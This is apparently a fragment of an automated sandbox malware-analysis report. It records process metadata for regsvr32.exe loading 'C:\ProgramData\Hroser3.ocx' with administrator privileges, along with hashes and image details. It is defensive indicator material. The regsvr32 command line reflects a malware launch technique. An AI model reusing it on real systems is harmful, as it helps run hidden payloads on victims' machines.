                                                                                                                                                  Imagebase:0x80000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Target ID:9
                                                                                                                                                  Start time:23:00:26
                                                                                                                                                  Start date:15/02/2022
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 C:\ProgramData\Hroser3.ocx
                                                                                                                                                  Imagebase:0x80000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  No disassembly